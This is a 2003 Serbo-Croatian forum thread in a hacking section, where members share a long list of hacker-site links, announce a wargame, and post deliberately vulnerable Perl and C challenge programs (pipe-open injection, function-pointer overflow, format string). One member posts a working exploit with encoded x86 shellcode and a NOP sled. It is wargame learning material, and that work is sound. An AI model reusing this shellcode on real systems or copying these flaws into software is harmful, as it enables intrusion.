Srodne teme
27.09.2004. Make-Hack
30.04.2003. 2 PITANJA
30.11.2003. Zastita sajta od HACK-a !!!
11.02.2004. Biranje script-i
04.04.2004. jos jedan kripto riddle
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

HACK!

[es] :: Defaced :: HACK!

Strane: 1 2

[ Pregleda: 922 | Odgovora: 29 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

passby
Pi.Ma.

Član broj: 11080
Poruke: 175
*.globalnet.hr



Profil

icon HACK!06.06.2003. u 16:04

Vidim ovdje se samo priča o zaštiti !
Ima tko da preporuči par web stranica od
hackiranju-razbijanju.

Hvala !
06.06.2003. u 16:04 

tOwk
Danilo Šegan
Zemun/Beograd

Član broj: 94
Poruke: 2743
*.beograd-2.tehnicom.net

ICQ: 9344053
Sajt: alas.matf.bg.ac.yu/~mm011..


Profil

icon Re: HACK!06.06.2003. u 16:22
Naravno kad si poslao u forum „Anonimnost i privatnost“. Prebačeno u „Defaced“, pa kolege, izvolite objasniti sve što je potrebno ;-)
Možda se moje mišljenje promenilo, ali ne i činjenica da sam u pravu.
06.06.2003. u 16:22 

Boomerang
Nebojsa Prvulovic
Nis

Član broj: 183
Poruke: 293
*.InfoSky.Net



Profil

icon Re: HACK!06.06.2003. u 23:03
Laptopovi

Evo nekih adresa koja sam jos pre sacuvao... Valjda jos rade ...
1. http://neworder.box.sk/
2. http://astalavista.box.sk/
3. http://black.box.sk/
4. http://blacksun.box.sk/
5. http://www.allhack.com
6. http://www.AntiCode.com
7. http://www.onething.com
8. http://www.rhone.ch
9. http://www.blackcode.com
10. http://www.blacknemesis.org
11. http://www.brokenrules.com
12. http://www.bullzeye.net
13. http://www.censorfreeworld.com
14. http://www.cotd.de
15. http://cultdeadbunnies.virtualave.net
16. http://www.cyber-comm.com
17. http://www.Cyber-Strike.com
18. http://www.cyberarmy.com
19. http://www.cyber-crew.net
20. http://www.cyrebels.org
21. http://www.deny.de
22. http://bettie.lower.org
23. http://www.ducktank.net
24. http://browse.security-source.net
25. http://www.security-source.net
26. http://www.damnation.net
27. http://geekmafia.dynip.com
28. http://www.hackpalace.com
29. http://www.hackuk.net
30. http://www.hackunlimited.com
31. http://www.lordsomer.com
32. http://www.hackersclub.com
33. http://www.hackers.com
34. http://www.hackhour.com.br
35. http://www.infowar.co.uk
36. http://www.hotmanscave.com
37. http://www.xs4all.nl
38. http://www.komd.com
39. http://www.ladysharrow.ndirect.co.uk
40. http://www.liquidmatrix.org
41. http://www.lockless.com
42. http://www.lyrikal.com
43. http://www.dgb-sys.com
44. http://www.paybackproductions.com
45. http://www.phase-one.org.uk
46. http://www.piratededucation.com
47. http://www.progenic.com
48. http://www.altern.org
49. http://www.projectgamma.com
50. http://www.security-network.net
51. http://www.brasirc.net
52. http://www.skydomain.com
53. http://www.smithklan.com
54. http://www.suddendischarge.com
55. http://www.system7.org
56. http://www.theargon.com
57. http://www.pheces.org
58. http://www.sinnocence.com
59. http://www.infected.gr
60. http://www.the-lamer.com
61. http://www.tlsecurity.com
62. http://www.torus.ndirect.co.uk
63. http://www.uhack.com
64. http://www.uha1.com
65. http://www.smithklan.com
66. http://www.vanhackez.com
67. http://www.vidhaker.com
68. http://warex.box.sk
69. http://home.cyberarmy.com
70. http://www.warforge.com
71. http://www.webfringe.co.uk
72. http://www.pange.demon.co.uk
ftp://ftp.censorfreeworld.com/pub/hack/
Before I fall in love
I'm preparing to leave her
06.06.2003. u 23:03 

Shadowed
.NET developer

Administrator
Član broj: 649
Poruke: 10608
*.rcub.bg.ac.yu



Profil

icon Re: HACK!07.06.2003. u 13:43
Jooo, prvo pogledaj sta imas na onim adresama koje si dobio.
Mislis da bi se Boomerang zezao da ti bira samo adrese o "hackiranju-razbijanju"? Dao ti covek pa ti lepo sve to procitaj a onda ako imas sta dalje da pitas, pitaj.
Against stupidity the gods themselves contend in vain
07.06.2003. u 13:43 

Mitrović Srđan
bloodzero
Majur //: Šabac

Član broj: 10261
Poruke: 2796
212.200.1.*

Sajt: freeshell-reviews.com


Profil

icon Re: HACK!22.06.2003. u 01:29
e to se trazi iako neki linkovi ne rade vise
Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!


22.06.2003. u 01:29 

Boomerang
Nebojsa Prvulovic
Nis

Član broj: 183
Poruke: 293
*.dial.InfoSky.Net



Profil

icon Re: HACK!22.06.2003. u 01:49
Posalji mi na mail one koji ne rade, bice obrisani ...
Before I fall in love
I'm preparing to leave her
22.06.2003. u 01:49 

DownBload

Član broj: 1333
Poruke: 310
*.net.hinet.hr



Profil

icon Re: HACK!26.06.2003. u 22:40
Hmmm...vidjeh kardinalnu gresku - netko je zaboravio http://www.kamikaza.org
Leon Juranic
26.06.2003. u 22:40 

Boomerang
Nebojsa Prvulovic
Nis

Član broj: 183
Poruke: 293
*.ptt.yu



Profil

icon Re: HACK!26.06.2003. u 22:54
Video sam ...Nista posebno... Cak sta vise ...
A posto si ti clan, ajde malo nam objasni stanje ...
Before I fall in love
I'm preparing to leave her
26.06.2003. u 22:54 

DownBload

Član broj: 1333
Poruke: 310
*.net.hinet.hr



Profil

icon Re: HACK!28.06.2003. u 13:35
Citat:
Boomerang:
Video sam ...Nista posebno... Cak sta vise ...
A posto si ti clan, ajde malo nam objasni stanje ...


Nisam ja niti rekao da je nesto posebno, al to je nazalost jedina grupa (po mojim saznanjima) iz ex-juge koja ipak nesto radi (koliko smo u mogucnosti) i mislim da se mogu naci neke korisne stvari na sajtu.

BTW: Uskoro cemo otvoriti jedan wargame server (mozda dva). Bit ce to neka slabija masina sa debian 3.0 woody distrom. Zadatak ce biti proci 21 nivo.
Nivoi su:

1-5: exploitanje sh skripta
6-10: exploitanje perl skripta
11-21: exploitanje C programa

Znanje potrebno za prolaz igre...normalno propusti u sh, perl i C
programima....konkretnije:

shell - neke osnovne stvari..
perl - RFP-ovi txtovi objavljeni u phracku na temu perla - poison null byte, pipe teqn1k....pa neke starije forice koje se mogu naci u PERL+CGI security txtovima.
C - klasika...razni stack overflowi, heap overflowi, off-by-one, signali, race condition, neka kriptografija (jednostavno) i sl.

evo za primjer, 2 programa koja sam objavio i na kamikazinom forumu...treba ih exploitati:


level 7:
------------------------------
#!/usr/bin/perl
#
# W4rCr0-21 - LEVEL VII coded by DownBload
#
# TIP: You can open text files, but what else can you open...
#

$ENV{'PATH'} = "/usr/local/bin:/bin:/usr/bin:";
$ENV{'BASH_ENV'} = "";

system ("/usr/bin/clear");

print "#########################\n";
print "# W4rCr0-21 - LEVEL VII #\n";
print "#########################\n";
print "- So, you found that stupid character...what now???\n\n";

print "> Which file do you wanna read today???\n";
$var = <>;
chop $var;

$var =~ s/([;<>\*'&\$!#\(\)\[\]\{\}:"`])/\\$1/g;

open (FD, "$var") || die ("ERROR: No such file!!!\n\n");
print "$var content:\n";
while (<FD>)
{
print;
}
close (FD);
------------------------------


level 17:
------------------------------
/*
W4rCr0-21 - LEVEL XVII coded by DownBload

TIP: Hmmm...very simple.
*/

#include <stdio.h>
#include <stdlib.h>

static char var[256];
static int (*func)();

int printstring (char *str)
{
printf ("> LOL, yeah...%s\n",str);
return 0; // no use :)))
}

main (int argc, char **argv)
{
char in[256];
int x;
long funcaddr;

system ("/usr/bin/clear");

printf ("##########################\n");
printf ("# W4rCr0-21 - LEVEL XVII #\n");
printf ("##########################\n");
printf ("- No more stack for you mister!!!\n\n");

func = printstring;

if (argc == 2)
strncpy (var,argv[1],260);

for (x=0;x<255;x++)
{
if (var[x] == '\xcd') {
printf ("> No simple shellcode for you today!!!\n");
exit(0);
}
}

printf ("> HAHAHAHAHA, gimme five :)))");
fgets (in,256,stdin);
funcaddr = func;
if ((funcaddr & 0xbf000000) == 0xbf000000) {
printf ("> I said no more stack for you mister!!!\n");
exit (0);
}

func(in);
}
------------------------------



Ajmo hackeri, exploitajte ove programe i postajte rjesenja :)))))).
Mozda ovo (defaced) nije pravi forum za to.

Sta je sad??? Nitko nezna rjesiti ove glupe zadacice??


Leon Juranic
28.06.2003. u 13:35 

charmender

Član broj: 16719
Poruke: 12
*.europronet.ba



Profil

icon Re: HACK!24.11.2003. u 17:18
manje od sat vremena nakon citanja tvog posta imao sam exploit u rukama :)

i izvinjavam se sto kasnim ali tek sam se prije nekoliko dana ukljucio u rad foruma

Code:

#include <stdio.h>
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xeb\x0d\x5e\x31\xc9\xb1\x47\x80\x36\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff"
"\xff\x54\x88\xe4\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x82\xc2\xf4\x82\xed\x0d"
"\x30\xf7\x8c\xba\x3e\x01\x01\x01\x82\xe5\xf1\x88\x7c\xe9\x8c\x4c\xe9\xc6\x44"
"\xed\x01\x01\x01\x01\xb9\x0a\x01\x01\x01\x88\xf3\x52\x88\xfa\xcc\x81\x5a\x8c"
"\x64\xf5\x5a\x5f\x5e\xc8\xc2\x2e\x63\x68\x6f\x2e\x72\x69\x01"

"[[ wvw.hackeri.org ]]"

"\xc0\x98\x04\x08";
// 0x80498c0
// ovo sam dobio koristeci gdb

main(){
        char *argz[3] = { "dusica_moja", shellcode,NULL };
        execv("./vuln",argz);
}

charmender
24.11.2003. u 17:18 

DownBload

Član broj: 1333
Poruke: 310
*.net4u.hr



Profil

icon Re: HACK!24.11.2003. u 22:20
Drago mi je da je barem netko napisao exploit i postao ga tu... :-)
Inace, na wargameu su varijable malo smanjene i tako se ne moze rijesiti taj nivo :->>>.
Postoji jos nacina.
Leon Juranic
24.11.2003. u 22:20 

manca
N/A

Član broj: 460
Poruke: 1300
*.ptt.yu

Jabber: manca@elitesecurity.org
ICQ: 94432046
Sajt: www.mtldesign.co.sr


Profil

icon Re: HACK!25.11.2003. u 21:09
Citat:
DownBload:
Hmmm...vidjeh kardinalnu gresku - netko je zaboravio http://www.kamikaza.org

To vise ne radi :)
Keep the faith....
MTL Design Studio....
http://www.mtldesign.co.sr
25.11.2003. u 21:09 

valajbeg
Sarajevo

Član broj: 5069
Poruke: 569
*.as53.sa-ap.bih.net.ba.

ICQ: 127234502
Sajt: www.microsoft.ba


Profil

icon Re: HACK!25.11.2003. u 23:35
Jos Zadataka?..
www.data.ba | www.microsoft.ba
Microsoft gives you Windows... Linux gives you the whole house. (A. Aganovic)
25.11.2003. u 23:35 

charmender

Član broj: 16719
Poruke: 12
*.europronet.ba



Profil

icon Re: HACK!26.11.2003. u 07:34
prijavio sam se na wargame

ponekad ne mogu da pokrenem neki proces, jer nemere da forkuje, malo to sredi

/usr/local/bin/level2
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049670 R_386_GLOB_DAT __gmon_start__
08049658 R_386_JUMP_SLOT __register_frame_info
0804965c R_386_JUMP_SLOT setgid
08049660 R_386_JUMP_SLOT system
08049664 R_386_JUMP_SLOT __deregister_frame_info
08049668 R_386_JUMP_SLOT __libc_start_main
0804966c R_386_JUMP_SLOT setuid

imam problema sa ovim prog, pretpostavljam da si ti ovo pisao,
pogledaj malo, ne radi mi drugi level,
ako je do mene da znam da idem dalje da istrazujem, jer

level1@cia:~$ ./level2.sh
level1@cia:~$

:) postovanje
charmender
26.11.2003. u 07:34 

charmender

Član broj: 16719
Poruke: 12
*.europronet.ba



Profil

icon Re: HACK!26.11.2003. u 08:05
Citat:
DownBload:
Drago mi je da je barem netko napisao exploit i postao ga tu... :-)
Inace, na wargameu su varijable malo smanjene i tako se ne moze rijesiti taj nivo :->>>.
Postoji jos nacina.


naravno, stavim shell kod u env, a umjesto ovog shell koda u var bi pisalo samo
jmp 0xblahblah
ili
call 0xblahblah

Keep It Simple Stupid
charmender
26.11.2003. u 08:05 

DownBload

Član broj: 1333
Poruke: 310
*.net4u.hr



Profil

icon Re: HACK!26.11.2003. u 21:54
Citat:
charmender:
prijavio sam se na wargame

ponekad ne mogu da pokrenem neki proces, jer nemere da forkuje, malo to sredi

/usr/local/bin/level2
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049670 R_386_GLOB_DAT __gmon_start__
08049658 R_386_JUMP_SLOT __register_frame_info
0804965c R_386_JUMP_SLOT setgid
08049660 R_386_JUMP_SLOT system
08049664 R_386_JUMP_SLOT __deregister_frame_info
08049668 R_386_JUMP_SLOT __libc_start_main
0804966c R_386_JUMP_SLOT setuid

imam problema sa ovim prog, pretpostavljam da si ti ovo pisao,
pogledaj malo, ne radi mi drugi level,
ako je do mene da znam da idem dalje da istrazujem, jer

level1@cia:~$ ./level2.sh
level1@cia:~$

:) postovanje


Sad sam isprobao i radi...
Mozda je previse juzera bilo na stroju :-)

Leon Juranic
26.11.2003. u 21:54 

BoyScout
Zagreb, Hrvatska

Član broj: 579
Poruke: 21
*.net.hinet.hr



Profil

icon Re: HACK!26.11.2003. u 22:38
Drago mi je da se barem nekome svidja wargame.

--BoyScout
26.11.2003. u 22:38 

igac
Banjaluka

Član broj: 415
Poruke: 562
*.dip.urc.bl.ac.yu



Profil

icon Re: HACK!27.11.2003. u 10:47
nekome ?!
koliko sam vidio ima 300+ clanova :)
"nice town, i'll take it..."
27.11.2003. u 10:47 

charmender

Član broj: 16719
Poruke: 12
*.bih.net.ba



Profil

icon Re: HACK!27.11.2003. u 17:06
Citat:
valajbeg:
Jos Zadataka?..

ev, jedan koji mi je pao na pamet, a to mi je jedan od omiljenih

http://hack.datafort.net/sourcecode5.html

Code:
int main(int argc, char *argv[])
{
if(argc) exit(1) ;
printf(argv[1000]);
}

charmender
27.11.2003. u 17:06 

manca
N/A

Član broj: 460
Poruke: 1300
*.ptt.yu

Jabber: manca@elitesecurity.org
ICQ: 94432046
Sajt: www.mtldesign.co.sr


Profil

icon Re: HACK!27.11.2003. u 21:25
Citat:
BoyScout:
Drago mi je da se barem nekome svidja wargame.

i meni se veoma svidja, samo mi nekako u zadnje vreme ne radi kamikaza, sta vi mislite ??

Keep the faith....
MTL Design Studio....
http://www.mtldesign.co.sr
27.11.2003. u 21:25 

[es] :: Defaced :: HACK!

Strane: 1 2

[ Pregleda: 922 | Odgovora: 29 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
27.09.2004. Make-Hack
30.04.2003. 2 PITANJA
30.11.2003. Zastita sajta od HACK-a !!!
11.02.2004. Biranje script-i
04.04.2004. jos jedan kripto riddle
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.